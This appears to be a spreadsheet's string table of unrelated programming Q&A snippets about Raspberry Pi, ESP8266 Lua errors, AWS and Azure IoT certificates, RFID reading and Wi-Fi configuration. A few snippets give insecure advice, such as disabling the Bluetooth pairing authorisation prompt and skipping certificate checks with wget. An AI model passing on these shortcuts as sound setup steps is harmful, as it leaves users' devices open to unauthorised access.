    recvData.append(self.PICC_READ)
    recvData.append(blockAddr)
    pOut = self.CalulateCRC(recvData)
    recvData.append(pOut[0])
    recvData.append(pOut[1])
    (status, backData, backLen) = self.MFRC522_ToCard(self.PCD_TRANSCEIVE, recvData)
    if not(status == self.MI_OK):
      print "Error while reading!"</t>
  </si>
  <si>
    <t>Second, in your app, you first login so that you get the user pool credential, then you call 
to exchange your user pool credential with aws temporary access credential:
    AWS.config.getCredentials(e =&gt; {
      if(e) console.log("Get credential failed", e);
      this.device = AwsIot.device({//AwsIot is the aws-iot-sdk package
        clientId: clientID,//clientId is just random string
        host: '*-ats.iot.us-west-2.amazonaws.com',//replace * with your own host
        protocol: 'wss',
        accessKeyId: AWS.config.credentials.accessKeyId,
        secretKey: AWS.config.credentials.secretAccessKey,
        sessionToken: AWS.config.credentials.sessionToken
      });
      this.device.on('connect', function() {
        console.log("DEVICE CONNECTED");
      });
      this.device.subscribe('test');
      this.device
      .on('message', function(topic, payload) {
        console.log(`TOPIC IS ${topic}\nMESSAGE IS ${payload.toString()}`);
      });
    });
But the above code will not work!!!</t>
  </si>
  <si>
    <t>In Drupal, comments are handled by the Comment module, which define the permissions that allow users to create, edit, and delete node comments.</t>
  </si>
  <si>
    <t>9/3/2018 3:22:07 PM info: iotedged -- Transparent gateway certificates not found, operating in quick start mode...                                                                                                                                               
    9/3/2018 3:22:07 PM info: iotedged -- Finished configuring certificates.</t>
  </si>
  <si>
    <t>Common PHP Questions
Passing $_POST values with cURL
RAW POST using cURL in PHP
PHP, cURL post to login to WordPress
Resources
cURL Wikipedia Article
cURL Website
curl command line tool detailed command line options reference
5 basic cURL command examples</t>
  </si>
  <si>
    <t>In ESC.h
In ESC.cpp
I want the ESCInitialised boolean to remain private, as it shouldn't be modifiable by any other class, so I'm using the public getter method isInitialised() to return it.</t>
  </si>
  <si>
    <t>All of this (give or take a curly brace):
Can probably be replaced with something like this:
thingShadows.updateWebSocketCredentials(AWS.config.credentials.accessKeyId,
                                        AWS.config.credentials.secretKey,
                                        AWS.config.credentials.sessionToken);
If you pass in a Logins map with the user pool id and access token in it, the getCredentialsForIdentity() call might succeed; I didn't test it.</t>
  </si>
  <si>
    <t>The exact same code does produce a backtrace on x86_64 (Debian stable), with backtrace() returning 6 frames:
#Makefile
CFLAGS=-Wall -Wextra -g
LDFLAGS=-rdynamic
Output on x86_64 (gcc (Debian 4.7.2-5) 4.7.2 with GNU libc6:amd64 2.13-38+deb7u1):
Hello, Backtrace
Last 6 frames:
./test(foo+0x19)[0x4009a5]
./test(bar+0x9)[0x4009e5]
./test(baz+0x9)[0x4009f0]
./test(main+0x13)[0x400a05]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xfd)[0x7f9286ddbead]
./test[0x4008a9]
Output on Raspberry Pi (gcc (Debian 4.6.3-14+rpi1) 4.6.3 with GNU libc6:armhf (2.13-38+rpi2+deb7u1)):
Hello, Backtrace
Last 0 frames:
I have verified that the compiled executable on Raspberry Pi is storing the frame pointer and link register to the stack.</t>
  </si>
  <si>
    <t>On the device I dont have a username, so I can connect by hitting return, and it doesn't ask me for a password, and takes me straight to a command prompt
When I try to implement this in C# using TCP Client, I get asked for a username, which I reply with a return, then I get asked for a password, which I reply with a return, then it returns invalid username or password, and disconnects me.</t>
  </si>
  <si>
    <t>There are two functions that can be achieved: using a public key to authenticate that a message originated with a holder of the paired private key; or encrypting a message with a public key to ensure that only the holder of the paired private key can decrypt it.</t>
  </si>
  <si>
    <t>3/12/2019 8:53:11 AM info: iotedged -- Configuring the Device private key using
                     "C:\\ADNM\\IoTEdge\\ssl\\private\\new-edge-device.key.pem".</t>
  </si>
  <si>
    <t>Signature files can also be added to the compilation command-line if you are using the command line directly.</t>
  </si>
  <si>
    <t>Node-RED, IOT Foundation Out Node Not Sending Commands
I have the IBM IoT Out Node parameters set as follows:
Authentication: Bluemix Service
Output type: Device command
Device type: Arduino-tempsensor (this is the same string I used for the device type (name) when I registered it in IoTF)
Device ID: I put the MAC address here, should it be more
Command Type: status (I used the word "status" here.</t>
  </si>
  <si>
    <t>I store all runtime settings in a file aptly called settings.lua, that looks like this:
I load it into a global table in init.lua, like this:
When I'm initializing WiFi I check to see if the password isn't nil.</t>
  </si>
  <si>
    <t>After uploading with ESPlorer when I run my code I get:
PANIC: unprotected error in call to Lua API (init_app.lua:40: error loading module 'leaksensor' from file 'leaksensor.lc':
    leaksensor.lc: bad constant in precompiled chunk)
Do I need anything specific when compiling?</t>
  </si>
  <si>
    <t>2.1) export the public cert to pem format (if it is not already in the pem format)
openssl x509 -inform DER -outform PEM -in mycert.cert -out server.crt.pem
2.2) Open server.crt.pem and copy the content between BEGIN CERTIFICATE and END CERTIFICATE and replace the  element in the file based IDP, which can be found in "core/repository/conf/identity/identity-providers/iot_default.xml" 
3) replace localhost for below entries in core/bin/wso2server.sh
-Diot.keymanager.host="wso2.exterminator.com" \
-Diot.gateway.host="wso2.exterminator.com" \
-Diot.core.host="wso2.exterminator.com" \
4) Set "true" to "EnabledUpdateApi"  in the file - "core/repository/conf/etc/webapp-publisher-config.xml".</t>
  </si>
  <si>
    <t>C# Example:
In the code, you may need to copy the DigiCert Baltimore Root Certificate to  from certs.c as base64 string(remove the lines -----BEGIN CERTIFICATE----- and -----END CERTIFICATE-----, and remove \r\n\).</t>
  </si>
  <si>
    <t>But that gave a weird error too...
For this code:
I receive the following error:
PANIC: unprotected error in call to Lua API (init.lua:24: attempt to
  call method 'connect' (a nil value))
Line 24 is the srv:connect line.</t>
  </si>
  <si>
    <t>*/
class SwitchContinuousAction : public AbstractAction
{
public:
  SwitchContinuousAction(Joystick_ *joystick, int pin, int btnIndex);
  void loop();
private:
  Joystick_ *_joystick;
  int _pin;
  int _btnIndex;
};
} // namespace JFSF_PRIV
class JFSF
{
public:
  JFSF(Joystick_ *joystick, bool doSendState); // doSendState should be true if Joystick_ does not auto send state.</t>
  </si>
  <si>
    <t>The PostgreSQL configurations:
For the pg_hba.conf content :
    # Database administrative login by Unix domain socket
    local   all             postgres                                peer
    # TYPE  DATABASE        USER            ADDRESS                 METHOD
    # "local" is for Unix domain socket connections only
    local   my_db_name     my_user_name     127.0.0.1/32            md5
    local   all     all                                             md5
    # IPv4 local connections:
    host    all             all             127.0.0.1/32            md5
    # IPv6 local connections:
    host    all             all             ::1/128                 md5
    # Allow replication connections from localhost, by a user with the
    # replication privilege.</t>
  </si>
  <si>
    <t>For example:
returns:
SyntaxError: invalid token
All you can do is to convert 04 to a string or remove the 0 entirely from your code.</t>
  </si>
  <si>
    <t>The error (first image)
Private key with start and end statements(second image)
Private key without start and end statements(third image)</t>
  </si>
  <si>
    <t>Yup separates the parsing and validating functions into separate steps so it can be used to parse json separate from validating it, via the cast method.</t>
  </si>
  <si>
    <t>Comment out the lines of code as shown below:
What that does it remove the prompt for authorisation and always accepts the pairing request.</t>
  </si>
  <si>
    <t>Thats is why you get an error 
error: uninitialized reference member 'web::_client'
To initialize a reference you have to use initialize list in the constructor.</t>
  </si>
  <si>
    <t>Then open the server.pem from a text editor and remove BEGIN CERTIFICATE and END CERTIFICATE lines as well as the new lines.</t>
  </si>
  <si>
    <t>As such, I was thinking of putting in this:
However, it's giving me this error:
Traceback (most recent call last):   File "test.py", line 19, in
      GPIO.add_event_detect(actionpin1, GPIO.BOTH, callback=action1, bouncetime=800) RuntimeError: Conflicting edge detection already
  enabled for this GPIO channel
This error conflicts with what I've read on this function, so I'm not sure why it's giving me this error.</t>
  </si>
  <si>
    <t>I created a test file to encrypt text with a public key (generated within my apache server on which I have the same library) in this way:
If I try to type php test.php the  variable is empty.</t>
  </si>
  <si>
    <t>You should use  otherwise the kernel may get tainted and your initialization and exit functions should be marked with __init and __exit macros like:
void __init init_module(void) {...}
void __exit r_int_release(void) {...} // exit code should cleanup all stuff
Furthermore the kernel needs to know which functions to call on module load and exit.</t>
  </si>
  <si>
    <t>Typically this Agent API is called by Bluez (in rasperry pi) when the device (iPhone/Android mobile/any bluetooth capable device) trying pair calls "RequestPasskey" or "RequestPinCode" from the device end.</t>
  </si>
  <si>
    <t>Features
Chainable Request / Response Methods
URL / JSON / plist Parameter Encoding
Upload File / Data / Stream / MultipartFormData
Download File using Request or Resume Data
Authentication with URLCredential
HTTP Response Validation
Upload and Download Progress Closures with Progress
cURL Command Output
Dynamically Adapt and Retry Requests
TLS Certificate and Public Key Pinning
Network Reachability
Comprehensive Unit and Integration Test Coverage
Project
Source Project on Github
Documentation</t>
  </si>
  <si>
    <t>To be clear, here is my main loop:
The main loop calls this function:
I intentionally put a valid card UID in the database just to test this function.</t>
  </si>
  <si>
    <t>return render_template('addMacs.html', title='Add MACs')
        if file:
            filename = secure_filename(file.filename)
            return "File Received"
    return render_template('addMacs.html', title='Add MACs')
html code for my file and textarea post request.</t>
  </si>
  <si>
    <t>/usr/local/sbin/cronjobs/virtualenv/secret_ciphers/bin/python3 /usr/local/sbin/cronjobs/csgostatsbot/CSGO_STATS_BOT_TASK.py
Edit in response to comments from OP:
The activate call is what activates the virtualenv.</t>
  </si>
  <si>
    <t>text file wrapped in -----BEGIN CERTIFICATE-----/-----END CERTIFICATE---- with a bunch of lines of encoded text in between).</t>
  </si>
  <si>
    <t>mosquitto.conf
connection bridge-to-watsoniot
bridge_insecure false
bridge_certfile /home/pi/server.crt
address myorg.messaging.internetofthings.ibmcloud.com:8883
cleansession false
try_private false
bridge_attempt_unsubscribe false
notifications true
notification_topic iot-2/type/Raspberry/id/my_mqtt_gateway/evt/status/fmt/raw
remote_username use-token-auth
remote_password ***************
remote_clientid g:myorg:Raspberry:my_mqtt_gateway
topic iot-2/type/+/id/+/cmd/+/fmt/+ in iot-2/type/+/id/+/cmd/+/fmt/+
topic iot-2/type/+/id/+/evt/+/fmt/+ out iot-2/type/+/id/+/evt/+/fmt/+
connection_messages true
mosqutto.log
1487240737: mosquitto version 1.4.10 (build date Thu, 25 Aug 2016 10:12:09 +0100) starting
1487240737: Config loaded from mosquitto.conf.</t>
  </si>
  <si>
    <t>Only static
public void returning methods are allowed for a BTrace class.</t>
  </si>
  <si>
    <t>The main limitation of providing only static factory methods is that
  classes without public or protected constructors cannot be subclassed.</t>
  </si>
  <si>
    <t>However, I keep getting error says "Authentication failure"
Here is the code i use in R @ Windows 7 and the error message i get:
I've generated a public/private key pair using PuttyGen in Windows 7 (without passphrase), added the public key into Raspberry Pi and export the private key in OpenSSH format under Windows 7's "D:\Temp\id_dsa_win1".</t>
  </si>
  <si>
    <t>So I removed the anonymous variables, method and path variables and upload the code.</t>
  </si>
  <si>
    <t>I see in your code the following calls
where
but 
int iForceSensorVoltage;
You are passing an int(signed) into the second argument.</t>
  </si>
  <si>
    <t>UID tag : 
160196116163
160196116163
Access denied
I already tried different types of comparing like string1 == string2, strcmp, and string1.equals(string2) and still it is access denied.</t>
  </si>
  <si>
    <t>On the python side, set  in your ctor:
On the win c++ side, enable hardware flow control in the DCB Struct:
DCB dcb;
SecureZeroMemory(&amp;dcb, sizeof(DCB));
dcb.DCBlength = sizeof(DCB);
fSuccess = GetCommState(dataFile, &amp;dcb)
dcb.fOutX = false;
dcb.fInX = false;
dcb.fOutxCtsFlow = true;
dcb.fOutxDsrFlow = true;
dcb.fDsrSensitivity = true;
dcb.fRtsControl = RTS_CONTROL_HANDSHAKE;
dcb.fDtrControl = DTR_CONTROL_HANDSHAKE;
fSuccess = SetCommState(hCom, &amp;dcb);</t>
  </si>
  <si>
    <t>return ERR_INVALID_CHECKSUM;
    }
    $token=substr($data,0,8);
    $data=substr($data,8);
    if(!is_valid_token($token)){
        return ERR_INVALID_TOKEN;
    }
    $inner_size_len=big_endian_uint16_t_to_native_number(substr($data,0,2));
    $data=substr($data,2);
    if(strlen($data) &lt; $inner_size_len){
        return ERR_INVALID_INNER_SIZE;
    }
    // remove padding bytes
    $data=substr($data,0,$inner_size_len);
    return $data; // the actual decrypted command
}
..?</t>
  </si>
  <si>
    <t>Example (VBA):
Related Tags:
split
text-processing
text-segmentation
Links:
How do I tokenize a string in C++?</t>
  </si>
  <si>
    <t>Test local and internal servers
You can test against any internal/private server or local HTML designs in their remote browsers through our secure tunnel setup via BrowserStack Local Binary support.</t>
  </si>
  <si>
    <t>-fstack-protector-strong -Wformat -Werror=format-security  ',
 'LIBC': '',
 'LIBDEST': '/usr/lib/python2.7',
 'LIBDIR': '/usr/lib',
 'LIBFFI_INCLUDEDIR': '',
 'LIBM': '-lm',
 'LIBOBJDIR': 'Python/',
 'LIBOBJS': '',
 'LIBP': '/usr/lib/python2.7',
 'LIBPC': '/usr/lib/arm-linux-gnueabihf/pkgconfig',
 'LIBPL': '/usr/lib/python2.7/config-arm-linux-gnueabihf',
 'LIBRARY': 'libpython2.7.a',
 'LIBRARY_OBJS': '\\',
 'LIBS': '-lpthread -ldl  -lutil',
 'LIBSUBDIRS': 'lib-tk lib-tk/test lib-tk/test/test_tkinter \\',
 'LINKCC': 'arm-linux-gnueabihf-gcc -pthread',
 'LINKFORSHARED': '-Xlinker -export-dynamic -Wl,-O1 -Wl,-Bsymbolic-functions',
 'LLVM_PROF_ERR': 'no',
 'LLVM_PROF_FILE': '',
 'LLVM_PROF_MERGER': 'true',
 'LN': 'ln',
 'LOCALMODLIBS': '-L/usr/lib -lz',
 'MACHDEP': 'linux2',
 'MACHDEPPATH': ':plat-arm-linux-gnueabihf',
 'MACHDEPS': 'plat-arm-linux-gnueabihf',
 'MACHDEP_OBJS': '',
 'MACHDESTLIB': '/usr/lib/python2.7',
 'MACH_C_THREADS': 0,
 'MACOSX_DEPLOYMENT_TARGET': '',
 'MAINCC': 'arm-linux-gnueabihf-gcc -pthread',
 'MAJOR_IN_MKDEV': 0,
 'MAJOR_IN_SYSMACROS': 0,
 'MAKESETUP': '../Modules/makesetup',
 'MANDIR': '/usr/share/man',
 'MEMTESTOPTS': '-l -x test_subprocess test_io test_lib2to3 \\ -x test_dl test___all__ test_fork1 \\',
 'MKDIR_P': '/bin/mkdir -p',
 'MODLIBS': '-L/usr/lib -lz',
 'MODOBJS': 'Modules/threadmodule.o  Modules/signalmodule.o  Modules/arraymodule.o  Modules/cmathmodule.o  Modules/mathmodule.o Modules/_math.o  Modules/_struct.o  Modules/timemodule.o  Modules/operator.o  Modules/_randommodule.o  Modules/_collectionsmodule.o  Modules/_heapqmodule.o  Modules/itertoolsmodule.o  Modules/stropmodule.o  Modules/_functoolsmodule.o  Modules/datetimemodule.o  Modules/_bisectmodule.o  Modules/unicodedata.o  Modules/_localemodule.o  Modules/bufferedio.o Modules/bytesio.o Modules/fileio.o Modules/iobase.o Modules/_iomodule.o Modules/stringio.o Modules/textio.o  Modules/fcntlmodule.o  Modules/spwdmodule.o  Modules/grpmodule.o  Modules/selectmodule.o  Modules/socketmodule.o Modules/timemodule.o  Modules/md5module.o Modules/md5.o  Modules/shamodule.o  Modules/sha256module.o  Modules/sha512module.o  Modules/syslogmodule.o  Modules/binascii.o  Modules/cStringIO.o  Modules/cPickle.o  Modules/zlibmodule.o  Modules/posixmodule.o  Modules/errnomodule.o  Modules/pwdmodule.o  Modules/_sre.o  Modules/_codecsmodule.o  Modules/_weakref.o  Modules/zipimport.o  Modules/symtablemodule.o  Modules/xxsubtype.o',
 'MODULE_OBJS': '\\',
 'MULTIARCH': 'arm-linux-gnueabihf',
 'MVWDELCH_IS_EXPRESSION': 1,
 'OBJECT_OBJS': '\\',
 'OLDPATH': ':lib-old',
 'OPCODETARGETGEN': '\\',
 'OPCODETARGETGEN_FILES': '\\',
 'OPCODETARGETS_H': '\\',
 'OPT': '-DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes',
 'OTHER_LIBTOOL_OPT': '',
 'PACKAGE_BUGREPORT': 0,
 'PACKAGE_NAME': 0,
 'PACKAGE_STRING': 0,
 'PACKAGE_TARNAME': 0,
 'PACKAGE_URL': 0,
 'PACKAGE_VERSION': 0,
 'PARSER_HEADERS': '\\',
 'PARSER_OBJS': '\\ Parser/myreadline.o Parser/tokenizer.o',
 'PGEN': 'Parser/pgen',
 'PGENOBJS': '\\ \\',
 'PGENSRCS': '\\ \\',
 'PGOBJS': '\\',
 'PGO_PROF_GEN_FLAG': '-fprofile-generate',
 'PGO_PROF_USE_FLAG': '',
 'PGSRCS': '\\',
 'PLATDIR': 'plat-arm-linux-gnueabihf',
 'PLATMACDIRS': 'plat-mac plat-mac/Carbon plat-mac/lib-scriptpackages \\',
 'PLATMACPATH': ':plat-mac:plat-mac/lib-scriptpackages',
 'POBJS': '\\',
 'POSIX_SEMAPHORES_NOT_ENABLED': 0,
 'PROFILE_TASK': '-m test.regrtest --pgo -x test_asyncore test_gdb test_multiprocessing test_subprocess',
 'PSRCS': '\\',
 'PTHREAD_SYSTEM_SCHED_SUPPORTED': 1,
 'PURIFY': '',
 'PYLONG_BITS_IN_DIGIT': 0,
 'PYTHON': 'python',
 'PYTHONFRAMEWORK': '',
 'PYTHONFRAMEWORKDIR': 'no-framework',
 'PYTHONFRAMEWORKINSTALLDIR': '',
 'PYTHONFRAMEWORKPREFIX': '',
 'PYTHONPATH': ':plat-arm-linux-gnueabihf:lib-tk:lib-old',
 'PYTHON_FOR_BUILD': './python -E',
 'PYTHON_HEADERS': '\\',
 'PYTHON_OBJS': '\\',
 'PY_CFLAGS': '-fno-strict-aliasing -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -Wdate-time -D_FORTIFY_SOURCE=2 -g -fdebug-prefix-map=/build/python2.7-9xgeTe/python2.7-2.7.13=.</t>
  </si>
  <si>
    <t>formatting changes:
logs have much more clean formatting
added a progress bar showing download progress
better search output with github repository links
multiple registries support
registry-specific configs + security fixes
easier switch between different npm registries
semver support for packages installable from github.</t>
  </si>
  <si>
    <t>I tried with all the tutorials I found:
I tested it with other ports (10000, 10001+)
on my router i have my pc in DMZ and i redirect to it the calls on port 22
I even tried with 127.0.0.1, 192.168.1.xxx and public IP instead of "localhost" and i added "GatewayPorts yes" in /etc/ssh/sshd_config
I added a public key so host A and B can ssh-ing each other without explicit password
I have 4 RaspberryPi devices in different places, I cant use static public IPs for those rpi and i cant forward ports on each router.</t>
  </si>
  <si>
    <t>Environment:
installed OSMC on Raspberry 2
downloaded, compiled and installed shrew soft vpn on the device
As user 'osmc' with ssh
 starts the daemon successfully
&gt; ikec -r "test.vpn" -a starts the client, loads the config and connects successfully
rc.local:
#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.</t>
  </si>
  <si>
    <t>The following line shows an example of the updating a device twin on the Device23 in the import file:
In the case of wrong reported property name, I do recommend to delete this device and imported back with the same authentication keys and correct device twin properties.</t>
  </si>
  <si>
    <t>After a little basic debugging i found out that the problem is with the function 
nfc.authenticateBlock(1, id ,blockn,KEY_A,keys)
where blockn goes from 0 to 63, according to the cpp file of the library; in another example (readMemoryBlock), block is 0x08, as well as in the readMemoryBlock function
it never returns true....so i tried to avoid the use of the function, and put a 
nfc.readMemoryBlock(1,0x8,block)
but it also return always false...so it seems that the library itself is having problems in getting the communication work fine.</t>
  </si>
  <si>
    <t>I used the following procedure to set this up:
Configured the /etc/freetds.conf file as follows
I then went to the command line and tested the connection with: tsql -S NAME -U username.</t>
  </si>
  <si>
    <t>Result is: IOTHUB_CLIENT_CONFIRMATION_OK 
Exception Thrown
Calling direct method...
IotHubException calling direct method:
IoT Hub not found!</t>
  </si>
  <si>
    <t>The resulting string matches with the result on the ESP8266 and LUA 5.1
Next I do the same encryption on my PC but with PHP 7.1
Alas, the resulting string don't match with the previous results.</t>
  </si>
  <si>
    <t>What we've come to with some WiFi tools, it seems that iOS uses WPA2 Personal algorithm for securing its Personal Hotspot, but any additional information might be useful for us...
For the moment, we have already tried :
Rename iPhone to remove any space and/or special characters 
Use a very simple password with no spaces and/or special characters 
Encode WiFi name in a base64 string on the Raspberry 3 /etc/wpa_supplicant/wpa_supplicant.conf conforming to this post but with no success
My wpa_supplicant.conf file looks currently like this : 
When pairing fails on a Raspberry Pi 3, the following logs can be observed :
Trying to associate with 76:8d:08:74:3c:33 (SSID='iphone6' freq=2412 MHz)  
CTRL-EVENT-ASSOC-REJECT status_code=16  
CTRL-EVENT-SCAN-STARTED  
CTRL-EVENT-SCAN-RESULT 
Do you have an idea of what could mean CTRL-EVENT-ASSOC-REJECT status_code=16
Any help or similar problem/experience from others people will be much appreciated, because this feature is critical for us, and a core to our business.</t>
  </si>
  <si>
    <t>I personally use python to connect my device and the line of code looks like this:
so yes I created the root.pem exactly like you did, and create the public and private file with a python script that basically is the same thing you do with openssl in command line.</t>
  </si>
  <si>
    <t>Command line argument
You can parse command line arguments to get credentials from it like:
And so execute your script with:
python myscript "root" "pa$$w0rd"
With this method credentials can't be found in any config file, but you have to execute it with arguments, if it's a deamon it can be ok, but if you want to use it as cron (by example), you will have to write credentials in crontab, so not so safe.</t>
  </si>
  <si>
    <t>Assuming you are using the arduino API to program your ESP8266
Set the wifi mode to AP_STA
WiFi.mode(WIFI_AP_STA);
Config the softAP (you can either hardcode the SSID and password or use an config file with a default value)
IPAddress apIP(192, 168, 1, 1);
WiFi.mode(WIFI_AP);
WiFi.softAPConfig(apIP, apIP, IPAddress(255, 255, 255, 0));
WiFi.softAP(apname, password);
(optional) Using the DNSServer library, you set an DNS server
Using the ESP8266WebServer library, you set an HTTP server
Call the onNotFound method of your server object, passing a closure that searches for the requested file, either on SPIFFs or on SD (or both, should you work with both interfaces) and streams it.</t>
  </si>
  <si>
    <t>This class is intended primarily for use with key objects whose equals methods test for object identity using the == operator.</t>
  </si>
  <si>
    <t>Is there any method that takes certificate and private key as parameters and returns as .p12 file in aws SDK?</t>
  </si>
  <si>
    <t>For reference here's the config (working) for my home network (in the same file):
network={
    ssid="wifi name"
    psk="pass"
    # Protocol type can be: RSN (for WP2) and WPA (for WPA1)
    proto=WPA
    # Key management type can be: WPA-PSK or WPA-EAP (Pre-Shared or Enterprise)
    key_mgmt=WPA-PSK
    # Pairwise can be CCMP or TKIP (for WPA2 or WPA1)
    pairwise=TKIP
    #Authorization option should be OPEN for both WPA1/WPA2 (in less commonly used are SHARED and LEAP)
    auth_alg=OPEN
}</t>
  </si>
  <si>
    <t>Done
The following NEW packages will be installed:
  python3-cairo python3-gi-cairo
The following packages will be upgraded:
  ca-certificates dpkg dpkg-dev file libcups2 libcupsimage2 libdpkg-perl
  libexiv2-14 libfaad2 libgs9 libgs9-common libmagic-mgc libmagic1
  libpam-systemd libsoup-gnome2.4-1 libsoup2.4-1 libsystemd0 libudev1 patch
  sense-emu-tools shared-mime-info systemd systemd-sysv tzdata udev
25 upgraded, 2 newly installed, 0 to remove and 0 not upgraded.</t>
  </si>
  <si>
    <t>Multiply terminals on one page (every terminal can have different command, its own authentication function and its own command
history) - you can switch between them with CTRL+TAB
It catch all exceptions and display error messages in terminal (you can see errors in your javascript and php code in terminal if
they are in interpreter function)
Support for basic text formatting (color, background, underline, bold, italic) inside echo function
You can create and overwrite existing keyboard shortcuts
https://terminal.jcubic.pl/</t>
  </si>
  <si>
    <t>source/main.s:17:17: error: unexpected token in '.section' directive
  .section .init
                ^
source/main.s:24:10: error: unexpected token in operand
  ldr r0,=0x20200000
         ^</t>
  </si>
  <si>
    <t>It eliminates the need to use exception handling to test for a FormatException in the event that the string is invalid and cannot be successfully parsed.</t>
  </si>
  <si>
    <t>Don't see an answer to the OP in this thread, so since I spent much time looking for it and for the sake of public knowledge, here's how to change the default UART baud rate on a Raspberry Pi:
Simply edit the file  to add the following line:
You will need root permissions to do so, so don't forget to either start with sudo su and then nano /boot/config.txt or simply sudo nano /boot/config.txt and add the specific line at the end.</t>
  </si>
  <si>
    <t>List&lt;PackageInfo&gt; getPackagesHoldingPermissions (String[] permissions, 
                                int flags)
Return a List of all installed packages that are currently holding any
  of the given permissions.</t>
  </si>
  <si>
    <t>Private npm registry
Provides the ability to host a local private registry, based by default on htpasswd authentication and local file system based.</t>
  </si>
  <si>
    <t>After that I tried listening for the connection event first, to see if it worked that way:
I receive the following error: 
PANIC: unprotected error in call to Lua API (init.lua:24: invalid
  callback name)
Line 24 is the srv:on('connection') line.</t>
  </si>
  <si>
    <t>The public key of the public/private key pair.</t>
  </si>
  <si>
    <t>However, the relative paths in his python script that implicitly reference the home folder of the non-privileged user pi would no longer be valid (since home now means the folder /root which is the home folder of the root user).</t>
  </si>
  <si>
    <t>Let's parse the error message one by one:
Unprotected error means that you did a normal function call, as opposed to a protected call (aka ), which is a function call where you expect errors to occur and want to provide means to handle them.</t>
  </si>
  <si>
    <t>it shows following error
Traceback (most recent call last):
File "/home/pi/code/dataauth.py", line 7, in  authentication =
  firebase.Authentication('secretkey',  'prateekrai266@gmail.com',
  extra={'id': 123}) AttributeError: 'FirebaseApplication' object has no
  attribute  'Authentication'
I'm able to fetch data without authentication i.e.</t>
  </si>
  <si>
    <t>I have created client with code like this:
and receiving error on calling esp8266:connect
PANIC: unprotected error in call to Lua API (init.lua:127: ssl not
  available)
When I previously have connect my Arduino, then it was important to flash Wi-Fi with SSL certificate.</t>
  </si>
  <si>
    <t>The DateTime.ToString() method returns an invalid string.</t>
  </si>
  <si>
    <t>According to the comments in the file RSA.php, then the command will return false if the key is invalid:</t>
  </si>
  <si>
    <t>If the value passes your validation tests, then isValid() should return TRUE.</t>
  </si>
  <si>
    <t>You could add the public key of the new secure element that was shipped as a replacement into IoT Core so that when the "main board" is replaced, the new key pair is already registered and the device can automatically pull state and config information from IoT core.</t>
  </si>
  <si>
    <t>Now I have more informations available, stack trace...
==== JS stack trace =========================================
    0: ExitFrame [pc: 0x37deae9c]
    1: StubFrame [pc: 0x37dec080]
Security context: 0x4b492701 &lt;JSObject&gt;
    2: encode(aka encode) [0x4fdd867d] [/home/pi/.node-red/node_modules/qs/lib/utils.js:~118] [pc=0x20067594](this=0x36c8438d &lt;undefined&gt;,str=0x43a423d1 &lt;Very long string[17508]&gt;)
    3: arguments adaptor frame: 2-&gt;1
    4: stringify(aka stringify) [0x4fdd737d] [/home/pi/.node-red/node_modules/qs/lib/stringify.js:61] [bytecode=0x289...</t>
  </si>
  <si>
    <t>if authorized_keys exists, append the .pub content at his end after a new line so you won't override it current content.</t>
  </si>
  <si>
    <t>Finally, the common secret is encrypted under the public part of a public/private key pair.</t>
  </si>
  <si>
    <t>I know there are modules that allow me to SSH in python, but I'm new to raspberry pi and python and I'm having issues installing the modules from command line.</t>
  </si>
  <si>
    <t>I have this method from Microsoft documentation: https://docs.microsoft.com/en-us/rest/api/eventhub/generate-sas-token 
I need to know what should I use for 'keyName', 'string key' parameters to call this method.</t>
  </si>
  <si>
    <t>Short example:
I have class Foo with private String user and String key.</t>
  </si>
  <si>
    <t>Create a Registry in Google Cloud IoT Core and setup devices and their public/private key pairs.</t>
  </si>
  <si>
    <t>Passing that string back into password_verify(), along with the plain-text password, will tell you if they match.</t>
  </si>
  <si>
    <t>Common Log Format entries take the form:
host ident authuser date request status bytes
Eg: 
References
Computer data logging
Server Logs
Audit Trails
Data Logging
SysLog
Common Log Format</t>
  </si>
  <si>
    <t>I want create ssh tunnel between local machine and remote server, so I use this command on my local machine:
Everything is working, I can connect to my local machine through remote server - using port 443.</t>
  </si>
  <si>
    <t>Exit mySQL:
\q
Stop mySQL services:  
sudo /etc/init.d/mysql stop
Start mySQL services: 
sudo /etc/init.d/mysql start
Test the new password by logging in to the database:
sudo mysql -u root -p
SHOW DATABASES;
CREATE DATABASE YOUR_DATABASE_NAME_HERE;
CREATE USER 'YOUR_NEW_USERNAME'@'localhost' IDENTIFIED BY 'YOUR_NEW_PASSWORD'; 
Note: Python needs a new user to allow communication to mySQL!</t>
  </si>
  <si>
    <t>URL rewriting relates to the process by which the URL of a website can be restructured/masked from its relative path as dictated by its location in terms of directory and file structure, and replaced with a customized address string which when entered/browsed to, resolves to the same (original) content.</t>
  </si>
  <si>
    <t>like this one:
COMSTEP  789 665 432 END
if the string starts with comstep, then to tokenize the string and get an integer array {789, 665, 432}.</t>
  </si>
  <si>
    <t>Login commands for the pi user only can be put into /home/pi/.bashrc</t>
  </si>
  <si>
    <t>Simply calling s:listen(7333) without any checking results in 
PANIC: unprotected error in call to Lua API (udpserver.lua:105: address in use)
when the code is run and s:listen has previously been run.</t>
  </si>
  <si>
    <t>SA -&gt; SB &lt;-&gt;(MQTT) D
Problem Statement : 
 - We need to share a S3 file b/w SA and D with SB not having capability to decrypt it
Assumptions : 
 - SB can talk to D and ask D about something like a public key, and pass it to SA
 - SA would then encrypt the S3 file using that public key and then pass the url to SB</t>
  </si>
  <si>
    <t>To get the raw file you need to add ?raw=true to the URL, so...
https://github.com/wyolum/alamode/blob/master/bundles/alamode-setup.tar.gz?raw=true
Since you're grabbing from an https server you'd probably want to add  --no-check-certificate.</t>
  </si>
  <si>
    <t>I'm going to just summarize what it did
Have a working IotEdgeDevice
Download the IotEdge Tools(for testing purposes only from the zip
file) 
Copy the hostname name from /etc/iotedge/config.yaml (from the host iotEdge Device) and create certificates from certificates generation tool/bash-scripts provided for testing purposes
Move the Root-cert, intermediatte cert, and key to Iot-Edge-Device and set their absolute paths (/home/user/certs/xxx.pem) in the config.yaml at iotedge(/etc/iotedge/ )
Restart IotEdge with systemctl(because why not)
Copy the RootCA to Leaf-Device(A rasberry pi in my case)
I know I had to do EITHER of the two but i ended up doing both of these (Point 8 and 9)
Install Root.Ca in OS (Copying rootCA.pem file into /usr/local/share/ca-certificates/ ) then running sudo update-ca-certificates.</t>
  </si>
  <si>
    <t>This function returns a string with one or more access method specifications that cause the user agent to use a particular proxy server, or to connect directly.</t>
  </si>
  <si>
    <t>After RaspberryPi 3 Boots up (The command line):
